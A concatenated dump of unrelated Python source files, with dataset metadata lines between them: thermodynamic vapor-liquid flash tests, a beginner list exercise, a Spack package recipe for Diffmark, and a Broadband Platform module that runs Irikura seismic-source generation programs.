kijs = [[0.0, -0.0122, -0.0159, 0.0], [-0.0122, 0.0, 0.0, 0.0952], [-0.0159, 0.0, 0.0, 0.0], [0.0, 0.0952, 0.0, 0.0]]
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas, 'kijs': kijs}
gas = CEOSGas(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
liq = CEOSLiquid(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
flasher = FlashVL(constants, correlations, liquid=liq, gas=gas)
res = flasher.flash(T=T, P=P, zs=zs)
assert res.gas
assert res.phase == 'V'
def test_bubble_T_PR_VL():
# Last point at 8e6 Pa not yet found.
constants = ChemicalConstantsPackage(CASs=['124-38-9', '110-54-3'], MWs=[44.0095, 86.17536], names=['carbon dioxide', 'hexane'], omegas=[0.2252, 0.2975], Pcs=[7376460.0, 3025000.0], Tbs=[194.67, 341.87], Tcs=[304.2, 507.6], Tms=[216.65, 178.075])
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True,
HeatCapacityGases=[HeatCapacityGas(poly_fit=(50.0, 1000.0, [-3.1115474168865828e-21, 1.39156078498805e-17, -2.5430881416264243e-14, 2.4175307893014295e-11, -1.2437314771044867e-08, 3.1251954264658904e-06, -0.00021220221928610925, 0.000884685506352987, 29.266811602924644])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [1.3740654453881647e-21, -8.344496203280677e-18, 2.2354782954548568e-14, -3.4659555330048226e-11, 3.410703030634579e-08, -2.1693611029230923e-05, 0.008373280796376588, -1.356180511425385, 175.67091124888998]))])
zs = [.5, .5]
T = 300.0
P = 1e6
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas}
gas = CEOSGas(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
liq = CEOSLiquid(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
flasher = FlashVL(constants, correlations, liquid=liq, gas=gas)
res = flasher.flash(P=7.93e6, VF=0, zs=zs)
assert_close(res.T, 419.0621213529388, rtol=1e-6)
def test_PR_four_bubble_dew_cases_VL():
zs=[.5, .5]
T=300.0
P=1E6
constants = ChemicalConstantsPackage(CASs=['98-01-1', '98-00-0'], MWs=[96.08406000000001, 98.09994], names=['2-furaldehyde', 'furfuryl alcohol'], omegas=[0.4522, 0.7340000000000001], Pcs=[5510000.0, 5350000.0], Tbs=[434.65, 441.15], Tcs=[670.0, 632.0], Tms=[235.9, 250.35])
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True,
HeatCapacityGases=[HeatCapacityGas(poly_fit=(298, 1000, [4.245751608816354e-21, -2.470461837781697e-17, 6.221823690784335e-14, -8.847967216702641e-11, 7.749899297737877e-08, -4.250059888737765e-05, 0.013882452355067994, -2.1404621487165327, 185.84988012691903])),
HeatCapacityGas(poly_fit=(250.35, 632.0, [-9.534610090167143e-20, 3.4583416772306854e-16, -5.304513883184021e-13, 4.410937690059558e-10, -2.0905505018557675e-07, 5.20661895325169e-05, -0.004134468659764938, -0.3746374641720497, 114.90130267531933]))])
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas}
gas = CEOSGas(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
liq = CEOSLiquid(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
flasher = FlashVL(constants, correlations, liquid=liq, gas=gas)
assert_close(flasher.flash(P=1e6, VF=0, zs=zs).T, 539.1838522423529, rtol=1e-6)
assert_close(flasher.flash(P=1e6, VF=1, zs=zs).T, 540.2081697501809, rtol=1e-6)
assert_close(flasher.flash(T=600.0, VF=0, zs=zs).P, 2766476.7473238464, rtol=1e-6)
assert_close(flasher.flash(T=600.0, VF=1, zs=zs).P, 2702616.6490743402, rtol=1e-6)
def test_C1_C10_PT_flash_VL():
IDs = ['methane', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9', 'C10']
zs=[.1]*10
T=300.0
P=1E5
constants = ChemicalConstantsPackage(CASs=['74-82-8', '74-84-0', '74-98-6', '106-97-8', '109-66-0', '110-54-3', '142-82-5', '111-65-9', '111-84-2', '124-18-5'], MWs=[16.04246, 30.06904, 44.09562, 58.1222, 72.14878, 86.17536, 100.20194000000001, 114.22852, 128.2551, 142.28168], names=['methane', 'ethane', 'propane', 'butane', 'pentane', 'hexane', 'heptane', 'octane', 'nonane', 'decane'], omegas=[0.008, 0.098, 0.152, 0.193, 0.251, 0.2975, 0.3457, 0.39399999999999996, 0.444, 0.49], Pcs=[4599000.0, 4872000.0, 4248000.0, 3796000.0, 3370000.0, 3025000.0, 2740000.0, 2490000.0, 2290000.0, 2110000.0], Tbs=[111.65, 184.55, 231.04, 272.65, 309.21, 341.87, 371.53, 398.77, 423.95, 447.25], Tcs=[190.56400000000002, 305.32, 369.83, 425.12, 469.7, 507.6, 540.2, 568.7, 594.6, 611.7], Tms=[90.75, 90.3, 85.5, 135.05, 143.15, 178.075, 182.15, 216.3, 219.9, 243.225])
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True,
HeatCapacityGases=[HeatCapacityGas(poly_fit=(50.0, 1000.0, [6.7703235945157e-22, -2.496905487234175e-18, 3.141019468969792e-15, -8.82689677472949e-13, -1.3709202525543862e-09, 1.232839237674241e-06, -0.0002832018460361874, 0.022944239587055416, 32.67333514157593])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [7.115386645067898e-21, -3.2034776773408394e-17, 5.957592282542187e-14, -5.91169369931607e-11, 3.391209091071677e-08, -1.158730780040934e-05, 0.002409311277400987, -0.18906638711444712, 37.94602410497228])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [7.008452174279456e-22, -1.7927920989992578e-18, 1.1218415948991092e-17, 4.23924157032547e-12, -5.279987063309569e-09, 2.5119646468572195e-06, -0.0004080663744697597, 0.1659704314379956, 26.107282495650367])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [-2.608494166540452e-21, 1.3127902917979555e-17, -2.7500977814441112e-14, 3.0563338307642794e-11, -1.866070373718589e-08, 5.4505831355984375e-06, -0.00024022110003950325, 0.04007078628096955, 55.70646822218319])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [7.537198394065234e-22, -4.946850205122326e-18, 1.4223747507170372e-14, -2.3451318313798008e-11, 2.4271676873997662e-08, -1.6055220805830093e-05, 0.006379734000450042, -1.0360272314628292, 141.84695243411866])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [1.3740654453881647e-21, -8.344496203280677e-18, 2.2354782954548568e-14, -3.4659555330048226e-11, 3.410703030634579e-08, -2.1693611029230923e-05, 0.008373280796376588, -1.356180511425385, 175.67091124888998])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [-1.4046935863496273e-21, 5.8024177500786575e-18, -7.977871529098155e-15, 7.331444047402207e-13, 9.954400606484495e-09, -1.2112107913343475e-05, 0.0062964696142858104, -1.0843106737278825, 173.87692850911935])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [-1.069661592422583e-22, -1.2992882995593864e-18, 8.808066659263286e-15, -2.1690080247294972e-11, 2.8519221306107026e-08, -2.187775092823544e-05, 0.009432620102532702, -1.5719488702446165, 217.60587499269303])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [6.513870466670624e-22, -5.318305817618858e-18, 1.8015815307749625e-14, -3.370046452151828e-11, 3.840755097595374e-08, -2.7203677889897072e-05, 0.011224516822410626, -1.842793858054514, 247.3628627781443])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [-1.702672546011891e-21, 6.6751002084997075e-18, -7.624102919104147e-15, -4.071140876082743e-12, 1.863822577724324e-08, -1.9741705032236747e-05, 0.009781408958916831, -1.6762677829939379, 252.8975930305735]))])
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas}
gas = CEOSGas(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
liq = CEOSLiquid(PRMIX, eos_kwargs, HeatCapacityGases=correlations.HeatCapacityGases, T=T, P=P, zs=zs)
flasher = FlashVL(constants, correlations, liquid=liq, gas=gas)
res = flasher.flash(T=T, P=P, zs=zs)
assert_close(res.VF, 0.3933480634014041, rtol=1e-5)
def test_combustion_products():
from chemicals.combustion import fuel_air_spec_solver
IDs = ['methane', 'carbon dioxide', 'ethane', 'propane',
'isobutane', 'butane', '2-methylbutane', 'pentane',
'hexane', 'nitrogen', 'oxygen', 'water']
T = C2K(15)
P = 1e5
zs_fuel = [0.9652228316853225, 0.0059558310220860665, 0.018185509193506685, 0.004595963476244076,
0.0009769695915451998, 0.001006970610302194, 0.000472984762445398, 0.0003239924667435125,
0.0006639799746946288, 0.002594967217109564, 0.0, 0.0]
zs_fuel = normalize(zs_fuel)
zs_air = [0.0]*9 + [0.79, 0.21] + [0.0]
constants, properties = ChemicalConstantsPackage.from_IDs(IDs)
combustion = fuel_air_spec_solver(zs_air=zs_air, zs_fuel=zs_fuel, CASs=constants.CASs,
atomss=constants.atomss, n_fuel=1.0, O2_excess=0.1)
zs = combustion['zs_out']
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas}
gas = CEOSGas(PRMIX, eos_kwargs, T=T, P=P, zs=zs, HeatCapacityGases=properties.HeatCapacityGases)
liquid = CEOSLiquid(PRMIX, eos_kwargs, T=T, P=P, zs=zs, HeatCapacityGases=properties.HeatCapacityGases)
flasher = FlashVL(constants, properties, liquid=liquid, gas=gas)
res = flasher.flash(T=400.0, P=1e5, zs=zs)
assert res.phase_count == 1
assert res.gas is not None
def test_furfuryl_alcohol_high_TP():
# Legacy bug, don't even remember what the original issue was
constants = ChemicalConstantsPackage(MWs=[98.09994, 18.01528], Tcs=[632.0, 647.14], Pcs=[5350000.0, 22048320.0], omegas=[0.734, 0.344], names=['furfuryl alcohol', 'water'], CASs=['98-00-0', '7732-18-5'])
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True,
HeatCapacityGases=[HeatCapacityGas(load_data=False, poly_fit=(250.35, 632.0, [-9.534610090167143e-20, 3.4583416772306854e-16, -5.304513883184021e-13, 4.410937690059558e-10, -2.0905505018557675e-07, 5.20661895325169e-05, -0.004134468659764938, -0.3746374641720497, 114.90130267531933])),
HeatCapacityGas(load_data=False, poly_fit=(50.0, 1000.0, [5.543665000518528e-22, -2.403756749600872e-18, 4.2166477594350336e-15, -3.7965208514613565e-12, 1.823547122838406e-09, -4.3747690853614695e-07, 5.437938301211039e-05, -0.003220061088723078, 33.32731489750759]))])
eos_kwargs = dict(Tcs=constants.Tcs, Pcs=constants.Pcs, omegas=constants.omegas)
zs = [0.4444445555555555, 1-0.4444445555555555]
T, P = 5774.577777777778, 220483199.99999997
gas = CEOSGas(eos_class=PRMIX, eos_kwargs=eos_kwargs, T=T, P=P, zs=zs, HeatCapacityGases=correlations.HeatCapacityGases)
liquid = CEOSLiquid(eos_class=PRMIX, eos_kwargs=eos_kwargs, T=T, P=P, zs=zs, HeatCapacityGases=correlations.HeatCapacityGases)
flasher = FlashVL(constants, correlations, liquid=liquid, gas=gas)
assert_close(flasher.flash(T=T, P=P, zs=zs).rho_mass(), 227.52709151903954)
def test_flash_GibbsExcessLiquid_ideal_Psat():
# Binary water-ethanol
T = 230.0
P = 1e5
zs = [.4, .6]
MWs = [18.01528, 46.06844]
Tcs = [647.086, 514.7]
Pcs = [22048320.0, 6137000.0]
omegas = [0.344, 0.635]
VaporPressures = [VaporPressure(extrapolation='DIPPR101_ABC|DIPPR101_ABC', exp_poly_fit=(273.17, 647.086, [-2.8478502840358144e-21, 1.7295186670575222e-17, -4.034229148562168e-14, 5.0588958391215855e-11, -3.861625996277003e-08, 1.886271475957639e-05, -0.005928371869421494, 1.1494956887882308, -96.74302379151317])),
VaporPressure(extrapolation='DIPPR101_ABC|DIPPR101_ABC', exp_poly_fit=(159.11, 514.7, [-2.3617526481119e-19, 7.318686894378096e-16, -9.835941684445551e-13, 7.518263303343784e-10, -3.598426432676194e-07, 0.00011171481063640762, -0.022458952185007635, 2.802615041941912, -166.43524219017118]))]
HeatCapacityGases = [HeatCapacityGas(poly_fit=(50.0, 1000.0, [5.543665000518528e-22, -2.403756749600872e-18, 4.2166477594350336e-15, -3.7965208514613565e-12, 1.823547122838406e-09, -4.3747690853614695e-07, 5.437938301211039e-05, -0.003220061088723078, 33.32731489750759])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [-1.162767978165682e-20, 5.4975285700787494e-17, -1.0861242757337942e-13, 1.1582703354362728e-10, -7.160627710867427e-08, 2.5392014654765875e-05, -0.004732593693568646, 0.5072291035198603, 20.037826650765965]))]
VolumeLiquids = [VolumeLiquid(poly_fit=(273.17, 637.096, [9.00307261049824e-24, -3.097008950027417e-20, 4.608271228765265e-17, -3.8726692841874345e-14, 2.0099220218891486e-11, -6.596204729785676e-09, 1.3368112879131157e-06, -0.00015298762503607717, 0.007589247005014652]),
Psat=VaporPressures[0], Tc=Tcs[0], Pc=Pcs[0], omega=omegas[0]),
VolumeLiquid(poly_fit=(159.11, 504.71000000000004, [5.388587987308587e-23, -1.331077476340645e-19, 1.4083880805283782e-16, -8.327187308842775e-14, 3.006387047487587e-11, -6.781931902982022e-09, 9.331209920256822e-07, -7.153268618320437e-05, 0.0023871634205665524]),
Psat=VaporPressures[1], Tc=Tcs[1], Pc=Pcs[1], omega=omegas[1])]
EnthalpyVaporizations = [EnthalpyVaporization(Tc=647.14, poly_fit_ln_tau=(273.17, 647.095, 647.14, [0.010220675607316746, 0.5442323619614213, 11.013674729940819, 110.72478547661254, 591.3170172192005, 1716.4863395285283, 4063.5975524922624, 17960.502354189244, 53916.28280689388])),
EnthalpyVaporization(Tc=514.0, poly_fit_ln_tau=(159.11, 513.9999486, 514.0, [-0.002197958699297133, -0.1583773493009195, -4.716256555877727, -74.79765793302774, -675.8449382004112, -3387.5058752252276, -7531.327682252346, 5111.75264050548, 50774.16034043739]))]
constants = ChemicalConstantsPackage(Tcs=Tcs, Pcs=Pcs, omegas=omegas, MWs=MWs, CASs=['7732-18-5', '64-17-5'])
correlations = PropertyCorrelationsPackage(constants, HeatCapacityGases=HeatCapacityGases, EnthalpyVaporizations=EnthalpyVaporizations,
VolumeLiquids=VolumeLiquids, VaporPressures=VaporPressures, skip_missing=True)
liquid = GibbsExcessLiquid(VaporPressures=VaporPressures,
HeatCapacityGases=HeatCapacityGases,
VolumeLiquids=VolumeLiquids,
EnthalpyVaporizations=EnthalpyVaporizations,
caloric_basis='Psat', equilibrium_basis='Psat',
T=T, P=P, zs=zs)
gas = IdealGas(T=T, P=P, zs=zs, HeatCapacityGases=HeatCapacityGases)
flasher = FlashVL(constants, correlations, liquid=liquid, gas=gas)
# All points were missing because G_dep was missing
res = flasher.flash(T=300, P=1e5, zs=zs)
assert res.liquid_count == 1
# Failing when two K values were under 1e-10
res = flasher.flash(T=100, P=1e5, zs=zs)
assert res.phase_count == 1
assert res.liquid_count == 1
# Wilson guessess are hard zeros
res = flasher.flash(T=5, P=1e5, zs=zs)
assert res.phase_count == 1
assert res.liquid_count == 1
# Wilson guesses inf, nan, and all zero
res = flasher.flash(T=6.2, P=5e4, zs=zs)
assert res.phase_count == 1
assert res.liquid_count == 1
# One (but not both) fugacity became zero
res = flasher.flash(T=8.4, P=1e-5, zs=zs)
assert res.phase_count == 1
assert res.liquid_count == 1
# Vapor fraction flashes
for VF_value in (0.0, 1e-5, .3, .5, .7, 1-1e-5, 1.0):
VF = flasher.flash(T=T, VF=VF_value, zs=zs)
check = flasher.flash(T=T, P=VF.P, zs=zs)
assert_close(VF.VF, check.VF, rtol=1e-9)
# Not exactly sure where the numerical challenge is occuring, but this is to be expected.
# The tolerance decays at very small numbers
for VF_value in (1e-7, 1e-8, 1-1e-7, 1-1e-8):
VF = flasher.flash(T=T, VF=VF_value, zs=zs)
check = flasher.flash(T=T, P=VF.P, zs=zs)
assert_close(VF.VF, check.VF, rtol=1e-5)
def test_flash_GibbsExcessLiquid_ideal_PsatPoynting():
# Binary water-ethanol
T = 230.0
P = 1e5
zs = [.4, .6]
MWs = [18.01528, 46.06844]
Tcs = [647.086, 514.7]
Pcs = [22048320.0, 6137000.0]
omegas = [0.344, 0.635]
VaporPressures = [VaporPressure(exp_poly_fit=(273.17, 647.086, [-2.8478502840358144e-21, 1.7295186670575222e-17, -4.034229148562168e-14, 5.0588958391215855e-11, -3.861625996277003e-08, 1.886271475957639e-05, -0.005928371869421494, 1.1494956887882308, -96.74302379151317])),
VaporPressure(exp_poly_fit=(159.11, 514.7, [-2.3617526481119e-19, 7.318686894378096e-16, -9.835941684445551e-13, 7.518263303343784e-10, -3.598426432676194e-07, 0.00011171481063640762, -0.022458952185007635, 2.802615041941912, -166.43524219017118]))]
HeatCapacityGases = [HeatCapacityGas(poly_fit=(50.0, 1000.0, [5.543665000518528e-22, -2.403756749600872e-18, 4.2166477594350336e-15, -3.7965208514613565e-12, 1.823547122838406e-09, -4.3747690853614695e-07, 5.437938301211039e-05, -0.003220061088723078, 33.32731489750759])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [-1.162767978165682e-20, 5.4975285700787494e-17, -1.0861242757337942e-13, 1.1582703354362728e-10, -7.160627710867427e-08, 2.5392014654765875e-05, -0.004732593693568646, 0.5072291035198603, 20.037826650765965]))]
VolumeLiquids = [VolumeLiquid(poly_fit=(273.17, 637.096, [9.00307261049824e-24, -3.097008950027417e-20, 4.608271228765265e-17, -3.8726692841874345e-14, 2.0099220218891486e-11, -6.596204729785676e-09, 1.3368112879131157e-06, -0.00015298762503607717, 0.007589247005014652]),
Psat=VaporPressures[0], Tc=Tcs[0], Pc=Pcs[0], omega=omegas[0]),
VolumeLiquid(poly_fit=(159.11, 504.71000000000004, [5.388587987308587e-23, -1.331077476340645e-19, 1.4083880805283782e-16, -8.327187308842775e-14, 3.006387047487587e-11, -6.781931902982022e-09, 9.331209920256822e-07, -7.153268618320437e-05, 0.0023871634205665524]),
Psat=VaporPressures[1], Tc=Tcs[1], Pc=Pcs[1], omega=omegas[1])]
EnthalpyVaporizations = [EnthalpyVaporization(Tc=647.14, poly_fit_ln_tau=(273.17, 647.095, 647.14, [0.010220675607316746, 0.5442323619614213, 11.013674729940819, 110.72478547661254, 591.3170172192005, 1716.4863395285283, 4063.5975524922624, 17960.502354189244, 53916.28280689388])),
EnthalpyVaporization(Tc=514.0, poly_fit_ln_tau=(159.11, 513.9999486, 514.0, [-0.002197958699297133, -0.1583773493009195, -4.716256555877727, -74.79765793302774, -675.8449382004112, -3387.5058752252276, -7531.327682252346, 5111.75264050548, 50774.16034043739]))]
constants = ChemicalConstantsPackage(Tcs=Tcs, Pcs=Pcs, omegas=omegas, MWs=MWs, CASs=['7732-18-5', '64-17-5'])
correlations = PropertyCorrelationsPackage(constants, HeatCapacityGases=HeatCapacityGases, EnthalpyVaporizations=EnthalpyVaporizations,
VolumeLiquids=VolumeLiquids, VaporPressures=VaporPressures, skip_missing=True)
eoss = [PR(Tc=Tcs[0], Pc=Pcs[0], omega=omegas[0], T=T, P=P),
PR(Tc=Tcs[1], Pc=Pcs[1], omega=omegas[1], T=T, P=P)]
liquid = GibbsExcessLiquid(VaporPressures=VaporPressures,
HeatCapacityGases=HeatCapacityGases,
VolumeLiquids=VolumeLiquids,
EnthalpyVaporizations=EnthalpyVaporizations,
caloric_basis='PhiSat', equilibrium_basis='PhiSat',
eos_pure_instances=eoss,
T=T, P=P, zs=zs)
gas = IdealGas(T=T, P=P, zs=zs, HeatCapacityGases=HeatCapacityGases)
flasher = FlashVL(constants, correlations, liquid=liquid, gas=gas)
# This was failing in pypy for a while instead of CPython
res = flasher.flash(T=15, P=1e5, zs=zs)
assert res.phase_count == 1
assert res.liquid_count == 1
| 1.140625 | 1 |
ex38.py | YunMeMeThaw/python_exercises | 0 | 6833 | <reponame>YunMeMeThaw/python_exercises<gh_stars>0
ten_things = "Apples Oranges cows Telephone Light Sugar"
print ("Wait there are not 10 things in that list. Let's fix")
stuff = ten_things.split(' ')
more_stuff = {"Day", "Night", "Song", "Firebee",
"Corn", "Banana", "Girl", "Boy"}
while len(stuff) !=10:
next_one = more_stuff.pop()
print("Adding: ", next_one)
stuff.append(next_one)
print (f"There are {len(stuff)} items n ow.")
print ("There we go : ", stuff)
print ("Let's do some things with stuff.")
print (stuff[1])
print (stuff[-1]) # whoa! cool!
print (stuff.pop())
print (' '.join(stuff)) # what? cool !
print ('#'.join(stuff[3:5])) #super stealler!
| 3.890625 | 4 |
var/spack/repos/builtin/packages/diffmark/package.py | player1537-forks/spack | 11 | 6834 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Diffmark(AutotoolsPackage):
"""Diffmark is a DSL for transforming one string to another."""
homepage = "https://github.com/vbar/diffmark"
git = "https://github.com/vbar/diffmark.git"
version('master', branch='master')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('pkgconfig', type='build')
depends_on('libxml2')
| 1.5625 | 2 |
bbp/comps/irikura_gen_srf.py | ZhangHCFJEA/bbp | 28 | 6835 | #!/usr/bin/env python
"""
Copyright 2010-2019 University Of Southern California
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import division, print_function
# Import Python modules
import os
import sys
import math
import shutil
# Import Broadband modules
import plot_srf
import bband_utils
from irikura_gen_srf_cfg import IrikuraGenSrfCfg
from install_cfg import InstallCfg
class IrikuraGenSrf(object):
"""
Implements Arben's gen_srf.csh script in Python
"""
def __init__(self, i_r_velmodel, i_r_srcfile,
o_r_srffile, i_vmodel_name, sim_id=0,
**kwargs):
self.sim_id = sim_id
self.r_velmodel = i_r_velmodel
self.r_srcfile = i_r_srcfile
self.r_srffile = o_r_srffile
self.vmodel_name = i_vmodel_name
self.r_srcfiles = []
# Get all src files that were passed to us
if kwargs is not None and len(kwargs) > 0:
for idx in range(len(kwargs)):
self.r_srcfiles.append(kwargs['src%d' % (idx)])
else:
# Not a multisegment run, just use the single src file
self.r_srcfiles.append(i_r_srcfile)
def run(self):
"""
This function prepares the parameters for Irikura's gen_srf then calls it
"""
print("IrikuraGenSrf".center(80, '-'))
# Load configuration, set sim_id
install = InstallCfg.getInstance()
sim_id = self.sim_id
# Build directory paths
a_tmpdir = os.path.join(install.A_TMP_DATA_DIR, str(sim_id))
a_indir = os.path.join(install.A_IN_DATA_DIR, str(sim_id))
a_outdir = os.path.join(install.A_OUT_DATA_DIR, str(sim_id))
a_logdir = os.path.join(install.A_OUT_LOG_DIR, str(sim_id))
a_param_outdir = os.path.join(a_outdir, "param_files")
# Make sure the output and tmp directories exist
bband_utils.mkdirs([a_tmpdir, a_indir, a_outdir,
a_logdir, a_param_outdir])
# Now, file paths
self.log = os.path.join(a_logdir, "%d.gen_srf.log" % (sim_id))
a_srcfiles = [os.path.join(a_indir,
srcfile) for srcfile in self.r_srcfiles]
# Read src file
cfg = IrikuraGenSrfCfg(a_srcfiles)
# Define location of input velocity model and output srf file
if cfg.num_srcfiles > 1:
a_srffile = os.path.join(a_tmpdir, self.r_srffile)
a_final_srffile = os.path.join(a_indir, self.r_srffile)
else:
a_srffile = os.path.join(a_indir, self.r_srffile)
a_velmod = os.path.join(install.A_IN_DATA_DIR, str(sim_id),
self.r_velmodel)
# Run in tmpdir subdir to isolate temp fortran files
# Save cwd, change back to it at the end
old_cwd = os.getcwd()
os.chdir(a_tmpdir)
# Read parameters from the src(s) file(s)
# The following parameters should be common to all SRC files
# So we just read from the first one
simulation_seed = int(cfg.CFGDICT[0]['seed'])
dip = cfg.CFGDICT[0]['dip']
rake = cfg.CFGDICT[0]['rake']
dlen = cfg.CFGDICT[0]['dlen']
dwid = cfg.CFGDICT[0]['dwid']
lon_top_center = cfg.CFGDICT[0]['lon_top_center']
lat_top_center = cfg.CFGDICT[0]['lat_top_center']
depth_to_top = cfg.CFGDICT[0]['depth_to_top']
if cfg.num_srcfiles > 1:
fault_len = cfg.CFGDICT[0]['max_fault_length']
else:
fault_len = cfg.CFGDICT[0]['fault_length']
fault_width = cfg.CFGDICT[0]['fault_width']
# Average strike of all SRC files
strike = 0.0
for segment in range(cfg.num_srcfiles):
strike = strike + cfg.CFGDICT[segment]['strike']
strike = math.ceil(strike / cfg.num_srcfiles)
# Hypocenter (down_dip is common to all src files)
hypo_down_dip = cfg.CFGDICT[0]['hypo_down_dip']
if cfg.num_srcfiles > 1:
hypo_along_stk = 0.0
for segment in range(cfg.num_srcfiles):
current_fault_len = cfg.CFGDICT[segment]['fault_length']
current_hypo_along_stk = cfg.CFGDICT[segment]['hypo_along_stk']
if abs(current_hypo_along_stk) <= current_fault_len:
# Hypocenter in this segment!
hypo_along_stk = hypo_along_stk + (current_fault_len / 2.0) + current_hypo_along_stk
break
else:
# Not here yet, just add the total length of this segment
hypo_along_stk = hypo_along_stk + current_fault_len
# Now convert hypo_along_stk so that 0.0 is the middle of the fault
hypo_along_stk = hypo_along_stk - (fault_len / 2.0)
else:
hypo_along_stk = cfg.CFGDICT[0]['hypo_along_stk']
#
# Run gen_srf code
#
progstring = ("%s >> %s 2>&1 << END\n" %
(os.path.join(install.A_IRIKURA_BIN_DIR, cfg.GENSRF),
self.log) +
"%s\n" % a_srffile +
"%f %f %f %f %f\n" %
(fault_len, fault_width,
strike, dip, rake) +
"%f %f %f\n" %
(lon_top_center, lat_top_center, depth_to_top) +
"%f %f\n" % (dlen, dwid) +
"%f %f %f %f\n" %
(hypo_along_stk, hypo_down_dip,
cfg.DENS, cfg.VS) +
"%f\n" % (cfg.DT) +
"%d\n" % (simulation_seed) +
"%s\n" % (a_velmod) +
"%f\n" % (cfg.VEL_RUP_FRAC) +
"END")
bband_utils.runprog(progstring)
if cfg.num_srcfiles > 1:
# Assign the slip from the planar fault to each segment's SRF file
a_segs_file = os.path.join(a_tmpdir, "segments.midpoint.txt")
# Write segments' file
seg_file = open(a_segs_file, 'w')
seg_file.write("segm lon lat depth fleng fwidth shypo zhypo strike dip rake\n")
seg_file.write("%d\n" % (cfg.num_srcfiles))
total_length = 0.0
for segment in range(cfg.num_srcfiles):
if abs(cfg.CFGDICT[segment]['hypo_along_stk']) <= cfg.CFGDICT[segment]['fault_length']:
hypo_along_stk = cfg.CFGDICT[segment]['hypo_along_stk']
hypo_down_dip = cfg.CFGDICT[segment]['hypo_down_dip']
else:
hypo_along_stk = 999.0
hypo_down_dip = 999.0
seg_file.write("seg%d %.6f %.6f %.1f %.1f %.1f %.1f %.1f %.1f %d %d %d\n" %
(segment + 1,
cfg.CFGDICT[segment]['lon_top_center'],
cfg.CFGDICT[segment]['lat_top_center'],
cfg.CFGDICT[segment]['depth_to_top'],
total_length,
(total_length + cfg.CFGDICT[segment]['fault_length']),
cfg.CFGDICT[segment]['fault_width'],
hypo_along_stk, hypo_down_dip,
cfg.CFGDICT[segment]['strike'],
cfg.CFGDICT[segment]['dip'],
cfg.CFGDICT[segment]['rake']))
total_length = total_length + cfg.CFGDICT[segment]['fault_length']
seg_file.close()
#
# Run gen_srf_segment code
#
for segment in range(cfg.num_srcfiles):
progstring = ("%s >> %s 2>&1 << END\n" %
(os.path.join(install.A_IRIKURA_BIN_DIR,
cfg.GENSRFSEGMENT), self.log) +
".\n" +
"%s\n" % (self.r_srffile) +
"./segments.midpoint.txt\n" +
"%d\n" % (segment + 1) +
"%f %f\n" % (dlen, dwid) +
"END")
# Run code
bband_utils.runprog(progstring)
#
# Now add the segments together
#
progstring = ("%s >> %s 2>&1 << END\n" %
(os.path.join(install.A_IRIKURA_BIN_DIR,
cfg.SUMSEG), self.log) +
".\n" +
"%s\n" % (self.r_srffile) +
"./segments.midpoint.txt\n" +
"%d\n" % (cfg.num_srcfiles) +
"%f %f\n" % (dlen, dwid) +
"END")
# Run code
bband_utils.runprog(progstring)
# Copy file to final location
progstring = "cp %s %s" % (os.path.join(a_tmpdir,
"all_seg.%s" %
(self.r_srffile)),
a_final_srffile)
bband_utils.runprog(progstring)
# Use copied file from now on
a_srffile = a_final_srffile
# Restore working directory
os.chdir(old_cwd)
#
# Move results to outputfile
#
progstring = "cp %s %s" % (a_srffile,
os.path.join(a_tmpdir, self.r_srffile))
bband_utils.runprog(progstring)
progstring = "cp %s %s" % (a_srffile,
os.path.join(a_outdir, self.r_srffile))
bband_utils.runprog(progstring)
shutil.copy2(os.path.join(a_tmpdir, "stress_drop.out"),
os.path.join(a_param_outdir,
"stress_drop.out"))
# Plot SRF
plot_srf.run(self.r_srffile, sim_id=self.sim_id)
print("IrikuraGenSrf Completed".center(80, '-'))
if __name__ == "__main__":
print("Testing Module: %s" % os.path.basename((sys.argv[0])))
ME = IrikuraGenSrf(sys.argv[1], sys.argv[2], sys.argv[3],
sys.argv[4], sim_id=int(sys.argv[5]))
ME.run()
| 2.21875 | 2 |
